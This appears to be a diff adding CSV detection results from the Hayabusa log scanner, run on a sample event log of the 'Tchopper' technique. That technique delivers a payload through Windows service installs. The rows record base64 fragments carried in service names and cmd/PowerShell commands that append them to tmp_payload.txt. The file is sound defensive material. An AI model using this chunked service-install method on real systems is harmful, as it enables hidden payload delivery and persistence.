+2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
